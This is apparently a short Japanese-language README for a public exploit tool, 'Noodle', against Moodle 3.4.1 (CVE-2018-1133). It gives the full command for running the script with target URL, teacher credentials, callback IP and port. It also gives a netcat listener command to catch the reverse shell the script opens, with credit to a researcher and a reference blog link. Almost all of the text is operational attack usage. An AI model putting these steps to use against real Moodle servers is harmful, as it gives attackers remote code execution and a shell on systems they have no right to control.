
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
教師ロールを持つユーザーが任意のコードを実行できます。
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user The account username
pass The password to the account
ip Callback IP
port Callback Port
course Valid course ID belonging to the teacher
このスクリプトを実行する前に、指定されたポートでnetcatリスナーを実行していることを確認してください。
nc -lnvp 1010
これにより、リスニング中のIPとポートへのリバースシェルを開こうとします。
このエクスプロイトは、Robin Peraglie氏が提供した情報に基づいています。
参考資料: https://blog.ripstech.com/2018/moodle-remote-code-execution